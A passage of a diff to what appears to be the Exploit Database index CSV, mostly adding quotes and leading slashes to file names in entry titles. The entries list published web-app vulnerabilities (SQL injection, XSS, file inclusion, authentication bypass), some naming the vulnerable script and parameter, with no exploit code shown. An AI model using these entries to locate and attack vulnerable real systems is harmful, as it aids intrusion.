P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - 'cp_downloads.php?did' SQL Injection",2007-01-12,Coloss,php,webapps,0 -29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x - Block-Old_Articles.php SQL Injection",2007-01-13,Paisterist,php,webapps,0 +29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x - 'Block-Old_Articles.php' SQL Injection",2007-01-13,Paisterist,php,webapps,0 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,asp,webapps,0 29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 - 'upgrade.php?gateway' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -31290,12 +31291,12 @@ id,file,description,date,author,platform,type,port 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0 29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 - [ASP] Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0 -29504,platforms/php/webapps/29504.txt,"Unique Ads - Banner.php SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 +29504,platforms/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 29505,platforms/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps,0 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - 'show.php' Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 -30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0 +30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - 'search.php' Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 @@ -31310,11 +31311,11 @@ id,file,description,date,author,platform,type,port 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0 -30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 +30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - 'Low.php' Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - 'index.php' Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps,0 30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 -30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 +30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - 'Configure_Plugin.TPL.php' Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection",2013-11-08,EgiX,php,webapps,80 @@ -31327,14 +31328,14 @@ id,file,description,date,author,platform,type,port 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 29525,platforms/php/webapps/29525.txt,"WordPress Theme Highlight Premium - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,php,webapps,0 -29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 +29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - 'admin.php' Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x - FName Parameter Information Disclosure",2007-01-26,ajann,php,webapps,0 29533,platforms/asp/webapps/29533.html,"AdMentor - Admin Login SQL Injection",2007-01-27,Cr@zy_King,asp,webapps,0 -29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 - Show_Webfeed.php SQL Injection",2007-01-27,St[at]rExT,php,webapps,0 +29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 - 'Show_Webfeed.php' SQL Injection",2007-01-27,St[at]rExT,php,webapps,0 29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 - 'index.php' SQL Injection",2007-01-27,adexior,php,webapps,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - 'setup.php?PATH_INFO' Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 -29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - 'system/index.php?Cookie PHPSESSID' SQL Injection",2007-02-26,r00t,php,webapps,0 +29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - '/system/index.php?Cookie PHPSESSID' SQL Injection",2007-02-26,r00t,php,webapps,0 29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 @@ -31344,15 +31345,15 @@ id,file,description,date,author,platform,type,port 36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 -29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 +29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - 'Login_Frame.php' Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 -29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - 'mod_news/index.php' chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 -29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - 'mod_news/goodies.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 -29564,platforms/php/webapps/29564.txt,"PortailPHP 2 - 'mod_news/index.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 -29565,platforms/php/webapps/29565.txt,"PortailPHP 2 - 'mod_news/goodies.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 -29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - 'mod_search/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 +29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - '/mod_news/index.php' chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 +29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 +29564,platforms/php/webapps/29564.txt,"PortailPHP 2 - '/mod_news/index.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 +29565,platforms/php/webapps/29565.txt,"PortailPHP 2 - '/mod_news/goodies.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 +29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusions",2007-02-05,anonymous,php,webapps,0 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 @@ -31363,30 +31364,30 @@ id,file,description,date,author,platform,type,port 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 29578,platforms/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagviewer.php' Multiple Remote File Inclusions",2007-02-12,K-159,php,webapps,0 29579,platforms/php/webapps/29579.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tag_process.php' Multiple Remote File Inclusions",2007-02-12,K-159,php,webapps,0 -29580,platforms/php/webapps/29580.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'CONFIG/errmsg.inc.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29581,platforms/php/webapps/29581.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/addTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29582,platforms/php/webapps/29582.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/ban_watch.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29583,platforms/php/webapps/29583.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/delTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29584,platforms/php/webapps/29584.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/delTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29585,platforms/php/webapps/29585.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/editTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29586,platforms/php/webapps/29586.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/editTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29587,platforms/php/webapps/29587.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/manageTagmins.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29588,platforms/php/webapps/29588.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/verify.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29589,platforms/php/webapps/29589.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/index.php?adminpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29590,platforms/php/webapps/29590.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/readconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/updateconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/updatefilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 -29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagmin/wordfilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29580,platforms/php/webapps/29580.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/CONFIG/errmsg.inc.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29581,platforms/php/webapps/29581.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/addTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29582,platforms/php/webapps/29582.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/ban_watch.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29583,platforms/php/webapps/29583.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/delTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29584,platforms/php/webapps/29584.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/delTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29585,platforms/php/webapps/29585.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/editTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29586,platforms/php/webapps/29586.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/editTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29587,platforms/php/webapps/29587.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/manageTagmins.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29588,platforms/php/webapps/29588.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/verify.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29589,platforms/php/webapps/29589.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/index.php?adminpath' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29590,platforms/php/webapps/29590.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/readconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29591,platforms/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updateconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29592,platforms/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updatefilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 +29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/wordfilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server - SearchResults.aspx Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 -29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 +29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - 'error.php' Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 -29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ - Arcade.php SQL Injection",2007-02-15,sp00k,php,webapps,0 -29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 - faq.php Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps,0 -29606,platforms/php/webapps/29606.txt,"Calendar Express - search.php Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0 +29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ - 'Arcade.php' SQL Injection",2007-02-15,sp00k,php,webapps,0 +29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 - 'faq.php' Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps,0 +29606,platforms/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,php,webapps,0 29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 - unistall.php Authentication Bypass",2007-02-26,r00t,php,webapps,0 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 - 'index.php' hier Parameter Cross-Site Scripting",2007-02-16,sn0oPy,php,webapps,0 29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0 @@ -31407,7 +31408,7 @@ id,file,description,date,author,platform,type,port 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Persistent Cross-Site Scripting",2013-11-16,"Ali Raza",ios,webapps,0 29634,platforms/php/webapps/29634.txt,"Plantilla - 'list_main_pages.php?nfolder' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 -29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 - edit.php Directory Traversal",2007-02-22,"laurent gaffie",php,webapps,0 +29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 - 'edit.php' Directory Traversal",2007-02-22,"laurent gaffie",php,webapps,0 29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 - 'step' Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0 29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 @@ -31418,27 +31419,27 @@ id,file,description,date,author,platform,type,port 29643,platforms/php/webapps/29643.txt,"Simple one-file Gallery - 'gallery.php?f' Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps,0 29644,platforms/php/webapps/29644.txt,"Pickle 0.3 - 'download.php' Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps,0 29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 - 'showcode.php' Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps,0 -29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - 'data/flatevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 - 'data/js.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 - 'data/m_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29649,platforms/php/webapps/29649.txt,"Active Calendar 1.2 - 'data/m_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29650,platforms/php/webapps/29650.txt,"Active Calendar 1.2 - 'data/m_4.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29651,platforms/php/webapps/29651.txt,"Active Calendar 1.2 - 'data/y_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 - 'data/y_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 -29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 - 'data/mysqlevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 - '/data/flatevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 - '/data/js.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 - '/data/m_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29649,platforms/php/webapps/29649.txt,"Active Calendar 1.2 - '/data/m_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29650,platforms/php/webapps/29650.txt,"Active Calendar 1.2 - '/data/m_4.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29651,platforms/php/webapps/29651.txt,"Active Calendar 1.2 - '/data/y_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29652,platforms/php/webapps/29652.txt,"Active Calendar 1.2 - '/data/y_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 +29653,platforms/php/webapps/29653.txt,"Active Calendar 1.2 - '/data/mysqlevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29790,platforms/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Persistent Cross-Site Scripting",2013-11-23,sajith,php,webapps,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php' searchkey Parameter Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 -29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x - 'modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-24,r00t,php,webapps,0 +29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-24,r00t,php,webapps,0 29663,platforms/php/webapps/29663.txt,"SolarPay - 'index.php' Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 29667,platforms/php/webapps/29667.txt,"WordPress Theme Euclid 1.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 29668,platforms/php/webapps/29668.txt,"WordPress Theme Dimension - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"WordPress Theme Amplus - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 29670,platforms/php/webapps/29670.txt,"WordPress Theme Make A Statement (MaS) - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -30367,platforms/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - 'admin/membersearch.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 +30367,platforms/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/membersearch.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 -30190,platforms/php/webapps/30190.txt,"Joomla! Component Letterman Subscriber Module 1.2.4 - Mod_Lettermansubscribe.php Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 +30190,platforms/php/webapps/30190.txt,"Joomla! Component Letterman Subscriber Module 1.2.4 - 'Mod_Lettermansubscribe.php' Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps,0 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - Autoscroll Parameter Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps,0 29672,platforms/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",hardware,webapps,37777 @@ -31451,23 +31452,23 @@ id,file,description,date,author,platform,type,port 29698,platforms/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php' nid Parameter Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps,0 29700,platforms/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps,0 29701,platforms/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 -29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - 'wp-includes/theme.php?iz' Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 +29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 -30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - 'admin/edituser.php?userid' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 +30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/edituser.php?userid' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0 30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' SQL Injection",2007-07-23,Lostmon,php,webapps,0 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0 -29727,platforms/php/webapps/29727.txt,"Premod SubDog 2 - 'includes/functions_kb.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 